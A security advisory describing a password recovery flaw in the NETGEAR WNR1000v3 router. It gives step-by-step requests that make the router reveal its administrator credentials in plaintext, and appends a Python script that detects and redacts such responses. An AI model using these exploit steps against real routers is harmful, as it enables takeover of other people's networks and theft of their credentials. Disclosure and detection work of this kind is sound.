NETGEAR WNR1000v3 Password Recovery Vulnerability


Description: Newer firmware versions of the NETGEAR N150 WNR1000v3 wireless router are affected by a password recovery vulnerability. Exploiting this vulnerability allows an attacker to recover the router's (plaintext) Administrator credentials and subsequently gain full access to the device. This vulnerability can be exploited remotely if the remote administration access feature is enabled (as well as locally via wired or wireless access).

Tested Device Model: Netgear N150 WNR1000v3

Tested Device Firmware Versions: V1.0.2.60_60.0.86, V1.0.2.54_60.0.82NA, and V1.0.2.62_60.0.87

Potential Impacts: Gaining full control over a wireless router exposes multiple attack vectors including: DoS, DNS control (many ways this can be leveraged to exploit clients), access to PPPoE credentials, cleartext WPA/WPA2 PSK (for guest and private network), firewall rule and port forwarding manipulation, etc.

Vulnerability Status: Vulnerability was privately disclosed to the vendor in June of 2013; however, they have not yet issued a patch.

Other Notes: This vulnerability remains exploitable when the password recovery feature of the router is disabled.

Overview: The password recovery mechanism appears to be designed to work as follows:

1.) After failing to log in, the user will be redirected to a password recovery page that requests the router serial number
2.) If the user enters the serial number correctly, another page will appear that requires the user to correctly answer 2 secret questions
3.) If the user answers the secret questions correctly, the router username and password are displayed

The problem: The implementation of this password recovery method has issues...lots of issues

Vulnerability and Exploit Details:

1.) Access the router login through a web browser:

2.) Select "Cancel" on the HTTP basic login box (or enter arbitrary credentials), the router responds with the following (Note the "unauth.cgi?id" parameter):

--------------------------------------------------
HTTP/1.0 401 Unauthorized
WWW-Authenticate: Basic realm="NETGEAR WNR1000v3"
Content-type: text/html

<html>
<head>
<meta http-equiv='Content-Type' content='text/html; charset=utf-8'>
<title>401 Unauthorized</title></head>
<body onload="document.aForm.submit()"><h1>401 Unauthorized</h1>
<p>Access to this resource is denied, your client has not supplied the correct authentication.</p><form method="post" action="unauth.cgi?id=78185530" name="aForm"></form></body>
</html>
--------------------------------------------------

3.) Use the unauth.cgi ID parameter to send the following (crafted) HTTP post request:

--------------------------------------------------
POST HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host:
Content-Length: 35
Connection: Keep-Alive
Pragma: no-cache
--------------------------------------------------

The username and (plaintext) password are returned in the response (truncated for brevity):

--------------------------------------------------
..
<tr>
<td class="MNUText" align="right">Router Admin Username</td>
<td class="MNUText" align="left">admin</td>
</tr>
<tr>
<td class="MNUText" align="right">Router Admin Password</td>
<td class="MNUText" align="left">D0n'tGuessMe!</td>
</tr>
..
--------------------------------------------------

Additional details and proof-of-concept exploit can be found here: http://c1ph04text.blogspot.com/2014/01/mitrm-attacks-your-middle-or-mine.html
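
A detection example for the exchange above, added here and not part of the original advisory: it flags management-interface responses that carry the "Router Admin Password" row and redacts the values before they reach an alert record. It assumes a monitoring point that sees cleartext HTTP response bodies from the router; the function names are hypothetical and the sample capture is constructed.

```python
import re

# Markers copied from the response excerpts in the advisory above.
UNAUTH_FORM = re.compile(r'action="unauth\.cgi\?id=\d+"')
CRED_ROW = re.compile(
    r'(<td class="MNUText" align="right">\s*Router Admin (Username|Password)\s*</td>'
    r'\s*<td class="MNUText" align="left">)(.*?)(</td>)', re.S)

def classify_response(body):
    """Label one HTTP response body from the router's management interface."""
    if any(m.group(2) == "Password" for m in CRED_ROW.finditer(body)):
        return "credential-disclosure"
    if UNAUTH_FORM.search(body):
        return "unauth-redirect"
    return None

def redact(body):
    """Mask the credential cells so the alert record never stores them."""
    return CRED_ROW.sub(lambda m: m.group(1) + "[REDACTED]" + m.group(4), body)

def scan(transactions):
    """transactions: iterable of (client, response_body) in capture order."""
    failed_login = set()
    alerts = []
    for client, body in transactions:
        kind = classify_response(body)
        if kind == "unauth-redirect":
            failed_login.add(client)
        elif kind == "credential-disclosure":
            alerts.append({"client": client,
                           "after_failed_login": client in failed_login,
                           "evidence": redact(body)})
    return alerts

# Constructed sample capture: documentation-range addresses, placeholder password.
SAMPLE = [
    ("192.0.2.10", '<form method="post" action="unauth.cgi?id=78185530" name="aForm"></form>'),
    ("192.0.2.10", '<tr> <td class="MNUText" align="right">Router Admin Username</td> '
                   '<td class="MNUText" align="left">admin</td> </tr> '
                   '<tr> <td class="MNUText" align="right">Router Admin Password</td> '
                   '<td class="MNUText" align="left">example-password</td> </tr>'),
    ("192.0.2.20", "<html><body>Router Status</body></html>"),
]

if __name__ == "__main__":
    for alert in scan(SAMPLE):
        print(alert["client"], alert["after_failed_login"], alert["evidence"])
```

Because the advisory notes the issue remains exploitable with password recovery disabled, a "credential-disclosure" hit on a device where recovery is turned off has no legitimate explanation and is worth alerting on by itself.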